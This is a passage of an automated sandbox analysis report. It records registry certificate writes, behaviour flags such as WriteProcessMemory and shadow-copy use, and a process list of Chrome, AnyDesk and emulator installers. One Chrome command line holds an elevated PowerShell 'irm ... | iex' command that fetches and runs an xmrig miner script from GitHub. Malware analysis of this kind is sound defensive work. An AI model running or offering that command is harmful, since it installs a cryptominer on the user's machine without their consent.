1fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 040000000100000010000000ee2931bc327e9ae6e8b5f751b43471900f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d343119000000010000001000000091fad483f14848a8a69b18b805cdbb3a20000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0400000001000000100000004be2c99196650cf40e5a9392a00afeb20f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d4190000000100000010000000fa46ce7cbb85cfb4310075313a09ee052000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 346579.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 939052.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Program Files\Wireshark\Wireshark.exe | N/A |
| N/A | N/A | F:\BlueStacks X\BlueStacks X.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | F:\LDPlayer\LDPlayer9\dnplayer.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Windows\system32\mmc.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe | N/A |
| N/A | N/A | C:\Program Files\Wireshark\Wireshark.exe | N/A |
| N/A | N/A | F:\BlueStacks X\BlueStacks X.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\fltmc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8aaa8ab58,0x7ff8aaa8ab68,0x7ff8aaa8ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2980 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3000 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4128 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3000 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3380 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3392 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4088 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3416 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4772 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4800 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3924 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2b4 0x4c4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3308 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3276 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5100 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5248 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4936 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5992 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5964 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe"
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe" --local-service
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe" --local-control
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe" --backend
C:\Program Files\Google\Chrome\Application\chrome.exe
